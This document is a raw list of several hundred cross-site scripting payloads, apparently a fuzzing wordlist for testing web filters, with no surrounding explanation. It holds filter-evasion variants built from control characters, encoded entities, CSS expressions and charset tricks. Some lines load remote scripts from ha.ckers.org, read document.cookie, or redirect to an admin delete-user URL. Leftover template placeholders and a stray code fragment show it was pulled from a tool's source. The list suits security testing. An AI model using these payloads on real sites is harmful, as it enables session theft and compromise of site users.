<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Djavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x0Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x15javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA8javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x16javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x02javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x06javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\xA9javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x80\x85javascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\xE2\x81\x9Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="\x1Cjavascript:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x00:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x3A:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x09:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0D:javascript:alert(1)" id="fuzzelement1">test</a>
<a href="javascript\x0A:javascript:alert(1)" id="fuzzelement1">test</a>
`"'><img src=xxx:x \x0Aonerror=javascript:alert(1)>
`"'><img src=xxx:x \x22onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Bonerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Donerror=javascript:alert(1)>
`"'><img src=xxx:x \x2Fonerror=javascript:alert(1)>
`"'><img src=xxx:x \x09onerror=javascript:alert(1)>
`"'><img src=xxx:x \x0Conerror=javascript:alert(1)>
`"'><img src=xxx:x \x00onerror=javascript:alert(1)>
`"'><img src=xxx:x \x27onerror=javascript:alert(1)>
`"'><img src=xxx:x \x20onerror=javascript:alert(1)>
"`'><script>\x3Bjavascript:alert(1)</script>
"`'><script>\x0Djavascript:alert(1)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(1)</script>
"`'><script>\xE2\x80\x81javascript:alert(1)</script>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
"`'><script>\xE3\x80\x80javascript:alert(1)</script>
"`'><script>\x09javascript:alert(1)</script>
"`'><script>\xE2\x80\x89javascript:alert(1)</script>
"`'><script>\xE2\x80\x85javascript:alert(1)</script>
"`'><script>\xE2\x80\x88javascript:alert(1)</script>
"`'><script>\x00javascript:alert(1)</script>
"`'><script>\xE2\x80\xA8javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(1)</script>
"`'><script>\xE1\x9A\x80javascript:alert(1)</script>
"`'><script>\x0Cjavascript:alert(1)</script>
"`'><script>\x2Bjavascript:alert(1)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(1)</script>
"`'><script>-javascript:alert(1)</script>
"`'><script>\x0Ajavascript:alert(1)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(1)</script>
"`'><script>\x7Ejavascript:alert(1)</script>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"`'><script>\xE2\x81\x9Fjavascript:alert(1)</script>
"`'><script>\xE2\x80\xA9javascript:alert(1)</script>
"`'><script>\xC2\x85javascript:alert(1)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x83javascript:alert(1)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(1)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(1)</script>
"`'><script>\xE2\x80\x80javascript:alert(1)</script>
"`'><script>\x21javascript:alert(1)</script>
"`'><script>\xE2\x80\x82javascript:alert(1)</script>
"`'><script>\xE2\x80\x86javascript:alert(1)</script>
"`'><script>\xE1\xA0\x8Ejavascript:alert(1)</script>
"`'><script>\x0Bjavascript:alert(1)</script>
"`'><script>\x20javascript:alert(1)</script>
"`'><script>\xC2\xA0javascript:alert(1)</script>
"/><img/onerror=\x0Bjavascript:alert(1)\x0Bsrc=xxx:x />
"/><img/onerror=\x22javascript:alert(1)\x22src=xxx:x />
"/><img/onerror=\x09javascript:alert(1)\x09src=xxx:x />
"/><img/onerror=\x27javascript:alert(1)\x27src=xxx:x />
"/><img/onerror=\x0Ajavascript:alert(1)\x0Asrc=xxx:x />
"/><img/onerror=\x0Cjavascript:alert(1)\x0Csrc=xxx:x />
"/><img/onerror=\x0Djavascript:alert(1)\x0Dsrc=xxx:x />
"/><img/onerror=\x60javascript:alert(1)\x60src=xxx:x />
"/><img/onerror=\x20javascript:alert(1)\x20src=xxx:x />
<script\x2F>javascript:alert(1)</script>
<script\x20>javascript:alert(1)</script>
<script\x0D>javascript:alert(1)</script>
<script\x0A>javascript:alert(1)</script>
<script\x0C>javascript:alert(1)</script>
<script\x00>javascript:alert(1)</script>
<script\x09>javascript:alert(1)</script>
"><img src=x onerror=javascript:alert(1)>
"><img src=x onerror=javascript:alert('1')>
"><img src=x onerror=javascript:alert("1")>
"><img src=x onerror=javascript:alert(`1`)>
"><img src=x onerror=javascript:alert(('1'))>
"><img src=x onerror=javascript:alert(("1"))>
"><img src=x onerror=javascript:alert((`1`))>
"><img src=x onerror=javascript:alert(A)>
"><img src=x onerror=javascript:alert((A))>
"><img src=x onerror=javascript:alert(('A'))>
"><img src=x onerror=javascript:alert('A')>
"><img src=x onerror=javascript:alert(("A"))>
"><img src=x onerror=javascript:alert("A")>
"><img src=x onerror=javascript:alert((À`))>
"><img src=x onerror=javascript:alert(À`)>
`"'><img src=xxx:x onerror\x0B=javascript:alert(1)>
`"'><img src=xxx:x onerror\x00=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0C=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0D=javascript:alert(1)>
`"'><img src=xxx:x onerror\x20=javascript:alert(1)>
`"'><img src=xxx:x onerror\x0A=javascript:alert(1)>
`"'><img src=xxx:x onerror\x09=javascript:alert(1)>
<script>javascript:alert(1)<\x00/script>
<img src=# onerror\x3D"javascript:alert(1)" >
<input onfocus=javascript:alert(1) autofocus>
<input onblur=javascript:alert(1) autofocus><input autofocus>
<video poster=javascript:javascript:alert(1)//
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><
br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br>
<br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input
autofocus>
<form id=test onforminput=javascript:alert(1)><input></form><button form=test
onformchange=javascript:alert(1)>X
<video><source onerror="javascript:javascript:alert(1)">
<video onerror="javascript:javascript:alert(1)"><source>
<form><button formaction="javascript:javascript:alert(1)">X
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction
actiontype="statusline#http://google.com"
xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div
style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden
onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/.
/,javascript:alert(1)//#">XXX</a></body>
<SCRIPT FOR=document EVENT=onreadystatechange>javascript:alert(1)</SCRIPT>
<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL"
VALUE="javascript:alert(1)"></OBJECT>
<object data="data:text/html;base64,%(base64)s">
<embed src="data:text/html;base64,%(base64)s">
<b <script>alert(1)</script>0
<div id="div1"><input value="`ònmouseover=javascript:alert(1)"></div> <div
id="div2"></div><script>document.getElementById("div2").innerHTML =
document.getElementById("div1").innerHTML;</script>
<x '="foo"><x foo='><img src=x onerror=javascript:alert(1)//'>
<embed src="javascript:alert(1)">
<img src="javascript:alert(1)">
<image src="javascript:alert(1)">
<script src="javascript:alert(1)">
<div style=width:1px;filter:glow onfilterchange=javascript:alert(1)>x
<? foo="><script>javascript:alert(1)</script>">
<! foo="><script>javascript:alert(1)</script>">
</ foo="><script>javascript:alert(1)</script>">
<? foo="><x foo='?><script>javascript:alert(1)</script>'>">
<! foo="[[[Inception]]"><x foo="]foo><script>javascript:alert(1)</script>">
<% foo><x foo="%><script>javascript:alert(1)</script>">
<div id=d><x xmlns="><iframe onload=javascript:alert(1)"></div>
<script>d.innerHTML=d.innerHTML</script>
<img \x00src=x onerror="alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x11src=x onerror="javascript:alert(1)">
<img \x12src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x10src=x onerror="javascript:alert(1)">
<img\x13src=x onerror="javascript:alert(1)">
<img\x32src=x onerror="javascript:alert(1)">
<img\x47src=x onerror="javascript:alert(1)">
<img\x11src=x onerror="javascript:alert(1)">
<img \x47src=x onerror="javascript:alert(1)">
<img \x34src=x onerror="javascript:alert(1)">
<img \x39src=x onerror="javascript:alert(1)">
<img \x00src=x onerror="javascript:alert(1)">
<img src\x09=x onerror="javascript:alert(1)">
<img src\x10=x onerror="javascript:alert(1)">
<img src\x13=x onerror="javascript:alert(1)">
<img src\x32=x onerror="javascript:alert(1)">
<img src\x12=x onerror="javascript:alert(1)">
<img src\x11=x onerror="javascript:alert(1)">
<img src\x00=x onerror="javascript:alert(1)">
<img src\x47=x onerror="javascript:alert(1)">
<img src=x\x09onerror="javascript:alert(1)">
<img src=x\x10onerror="javascript:alert(1)">
<img src=x\x11onerror="javascript:alert(1)">
<img src=x\x12onerror="javascript:alert(1)">
<img src=x\x13onerror="javascript:alert(1)">
<img[a][b][c]src[d]=x[e]onerror=[f]"alert(1)">
<img src=x onerror=\x09"javascript:alert(1)">
<img src=x onerror=\x10"javascript:alert(1)">
<img src=x onerror=\x11"javascript:alert(1)">
<img src=x onerror=\x12"javascript:alert(1)">
<img src=x onerror=\x32"javascript:alert(1)">
<img src=x onerror=\x00"javascript:alert(1)">
<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
<img src="x` `<script>javascript:alert(1)</script>"` `>
<img src onerror /" '"= alt=javascript:alert(1)//">
<title onpropertychange=javascript:alert(1)></title><title title=>
<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x
onerror=javascript:alert(1)></a>">


<script src="/\%(jscript)s"></script>
<script src="\\%(jscript)s"></script>
<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object
classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="javascript:alert(1)"
style="behavior:url(#x);"><param name=postdomevents /></object>
<a style="-o-link:'javascript:javascript:alert(1)';-o-link-source:current">X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-
source:current}]{color:red};</style>
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
<style>@import "data:,*%7bx:expression(javascript:alert(1))%7D";</style>
<a style="pointer-events:none;position:absolute;"><a style="position:absolute;"
onclick="javascript:alert(1);">XXX</a></a><a
href="javascript:javascript:alert(1)">XXX</a>
<style>*[{}@import'%(css)s?]</style>X
<div style="font-family:'foo
;color:red;';">XXX
<div style="font-family:foo}color=red;">XXX
<// style=x:expression\28javascript:alert(1)\29>
<style>*{x:ｅｘｐｒｅｓｓｉｏｎ(javascript:alert(1))}</style>
<div style=content:url(%(svg)s)></div>
<div style="list-style:url(http://foo.f)\20url(javascript:javascript:alert(1));">X
<div id=d><div style="font-family:'sans\27\3B color\3Ared\3B'">X</div></div>
<script>with(document.getElementById("d"))innerHTML=innerHTML</script>
<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X
<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/
foo.jpg);">X
<div id="x">XXX</div> <style> #x{font-family:foo[bar;color:green;} #y];color:red;{}
</style>
<x style="background:url('x;color:red;/*')">XXX</x>
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(1))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function()
{javascript:alert(1)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}]
[0].constructor._('javascript:alert(1)')()</script>
<meta charset="x-imap4-modified-
utf7">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHI
AdAAoADEAKQ&ACAAPABi
<meta charset="x-imap4-modified-utf7">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/
script&X&>
<meta charset="mac-farsi">¼script¾javascript:alert(1)¼/script¾
X<x style=`behavior:url(#default#time2)` onbegin=`javascript:alert(1)` >
1<set/xmlns=ùrn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)`
attributename=ìnnerhtml`
to=`<img/src="x"onerror=javascript:alert(1)>`>
1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2)
attributename=innerhtml
values=<img/src="."onerror=javascript:alert(1)>>
<vmlframe xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%
(vml)s#xss></vmlframe>
1<a href=#><line xmlns=urn:schemas-microsoft-com:vml
style=behavior:url(#default#vml);position:absolute
href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0
to=1000 /></a>
<a style="behavior:url(#default#AnchorClick);"
folder="javascript:javascript:alert(1)">XXX</a>
<x style="behavior:url(%(sct)s)">
<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss"
datafld="payload"></label>
<event-source src="%(event)s" onload="javascript:alert(1)">
<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-
event-stream,Event:click%0Adata:XXX%0A%0A">
<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t"
implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x"
to="<imgsrc=x:xonerror=javascript:alert(1)>">
<script>%(payload)s</script>
<script src=%(jscript)s></script>
<script language='javascript' src='%(jscript)s'></script>
<script>javascript:alert(1)</script>
<IMG SRC="javascript:javascript:alert(1);">
<IMG SRC=javascript:javascript:alert(1)>
<IMG SRC=`javascript:javascript:alert(1)`>
<SCRIPT SRC=%(jscript)s?<B>
<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET>
<BODY ONLOAD=javascript:alert(1)>
<BODY ONLOAD=javascript:javascript:alert(1)>
<IMG SRC="jav ascript:javascript:alert(1);">
<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)>
<SCRIPT/SRC="%(jscript)s"></SCRIPT>
<<SCRIPT>%(payload)s//<</SCRIPT>
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);">
<IMG DYNSRC="javascript:javascript:alert(1)">
<IMG LOWSRC="javascript:javascript:alert(1)">
<BGSOUND SRC="javascript:javascript:alert(1);">
<BR SIZE="&{javascript:alert(1)}">
<LAYER SRC="%(scriptlet)s"></LAYER>
<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);">
<STYLE>@import'%(css)s';</STYLE>
<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet">
<XSS STYLE="behavior: url(%(htc)s);">
<STYLE>li {list-style-image:
url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);">
<META HTTP-EQUIV="refresh" CONTENT="0;
URL=http://;URL=javascript:javascript:alert(1);">
<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME>
<TABLE BACKGROUND="javascript:javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:javascript:alert(1))">
<DIV STYLE="width:expression(javascript:alert(1));">
<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))">
<XSS STYLE="xss:expression(javascript:alert(1))">
<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE>
<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE>

<BASE HREF="javascript:javascript:alert(1);//">
<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url
value=javascript:javascript:alert(1)></OBJECT>
<HTML xmlns:xss><?import namespace="xss"
implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML
ID="xss"><I><B><IMG SRC="javascript:javascript:alert(1)"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B"
DATAFORMATAS="HTML"></SPAN>
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import
namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML"
to="XSS<SCRIPT DEFER>javascript:alert(1)</SCRIPT>"></BODY></HTML>
<SCRIPT SRC="%(jpg)s"></SCRIPT>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X
<body
onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
<br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><
br><br><br><br><br><input autofocus>
<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)">
<STYLE>@import'%(css)s';</STYLE>
<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE>
<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/
script&&>
<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT>
<style onreadystatechange=javascript:javascript:alert(1);></style>
<?xml version="1.0"?><html:html
xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</
html:script></html:html>
<embed code=%(scriptlet)s></embed>
<embed code=javascript:javascript:alert(1);></embed>
<embed src=%(jscript)s></embed>
<frameset onload=javascript:javascript:alert(1)></frameset>
<object onerror=javascript:javascript:alert(1)>
<embed type="image" src=%(scriptlet)s></embed>
<XML ID=I><X><C><![CDATA[<IMG
SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml>
<IMG SRC=&{javascript:alert(1);};>
<a href="jav&#65ascript:javascript:alert(1)">test1</a>
<a href="jav&#97ascript:javascript:alert(1)">test1</a>
<embed width=500 height=500
code="data:text/html,<script>%(payload)s</script>"></embed>
<iframe
srcdoc="&LT;iframe/srcdoc=&lt;img/src=&apos;&apos;onerror=javascr
ipt:alert(1)&gt;>">
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG
SRC=javascript:ale&#
114;t('XSS')>
<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112
&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#00
00088&#0000083&#0000083&#0000039&#0000041>
<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&
#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav
ascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
<IMG SRC="  javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html
base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\
0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\
0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH
A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv
MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs
aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw
IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh
TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml"
AllowScriptAccess="always"></EMBED>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<iframe src="&Tab;javascript:prompt(1)&Tab;">
<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'
<input/onmouseover="javaSCRIPT&colon;confirm(1)"
<sVg><scRipt >alert(1) {Opera}
<img/src=`` onerror=this.onerror=confirm(1)
<form><isindex formaction="javascript&colon;confirm(1)"
<img src=``&NewLine; onerror=alert(1)&NewLine;
